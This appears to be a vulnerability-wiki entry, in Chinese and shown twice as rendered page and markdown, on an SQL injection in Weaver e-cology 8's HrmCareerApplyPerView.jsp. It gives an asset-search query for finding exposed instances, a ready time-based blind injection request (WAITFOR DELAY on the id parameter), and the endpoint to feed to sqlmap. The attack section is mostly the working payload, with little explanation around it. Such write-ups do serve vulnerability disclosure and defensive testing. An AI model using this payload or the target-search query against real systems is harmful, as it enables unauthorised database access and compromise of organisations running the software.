fofamini-wiki

登录白背景

源码

泛微E-cology 8 HrmCareerApplyPerView 存在SQL注入漏洞

一、漏洞简介

泛微e-cology是一款由泛微网络科技开发的协同管理平台，支持人力资源、财务、行政等多功能管理和移动办公。泛微e-cology存在SQL注入漏洞，攻击者利用Web应用程序对用户输入验证上的疏忽,在输入的数据中包含对某些数据库系统有特殊意义的符号或命令,让攻击者有机会直接对后台数据库系统下达指令,进而实现对后台数据库乃至整个应用系统的入侵。

二、影响版本

泛微e-cology 8

三、资产测绘

hunterapp.name="泛微 e-cology OA"
特征

四、漏洞复现

GET /pweb/careerapply/HrmCareerApplyPerView.jsp?id=1+WAITFOR+DELAY+%270%3A0%3A5%27 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 6.2) AppleWebKit/532.1 (KHTML, like Gecko) Chrome/41.0.887.0 Safari/532.1
Host: 
Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
Connection: close

sqlmap

/pweb/careerapply/HrmCareerApplyPerView.jsp?id=1

原文: https://www.yuque.com/xiaokp7/ocvun2/esaandqig2xspu56

# 泛微E-cology 8 HrmCareerApplyPerView 存在SQL注入漏洞

# 一、漏洞简介
泛微e-cology是一款由泛微网络科技开发的协同管理平台，支持人力资源、财务、行政等多功能管理和移动办公。泛微e-cology存在SQL注入漏洞，攻击者利用Web应用程序对用户输入验证上的疏忽,在输入的数据中包含对某些数据库系统有特殊意义的符号或命令,让攻击者有机会直接对后台数据库系统下达指令,进而实现对后台数据库乃至整个应用系统的入侵。

# 二、影响版本

- 泛微e-cology 8

# 三、资产测绘

- hunter`app.name="泛微 e-cology OA"`
- 特征

![image.png](./img/W_PYAm7SGSg2yy6K/1694364042059-7f283133-b456-4f2c-a302-42ceec03cba1-454851.png)

# 四、漏洞复现
```
GET /pweb/careerapply/HrmCareerApplyPerView.jsp?id=1+WAITFOR+DELAY+%270%3A0%3A5%27 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 6.2) AppleWebKit/532.1 (KHTML, like Gecko) Chrome/41.0.887.0 Safari/532.1
Host: 
Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
Connection: close
```
![image.png](./img/W_PYAm7SGSg2yy6K/1706799959522-062e1606-f2c3-477f-826d-d6afa2b4e7f9-616138.png)
sqlmap
```
/pweb/careerapply/HrmCareerApplyPerView.jsp?id=1
```
![image.png](./img/W_PYAm7SGSg2yy6K/1706799983730-a1a14ef0-a6d7-4ccf-b732-aac6288768fc-817403.png)

> 原文: <https://www.yuque.com/xiaokp7/ocvun2/esaandqig2xspu56>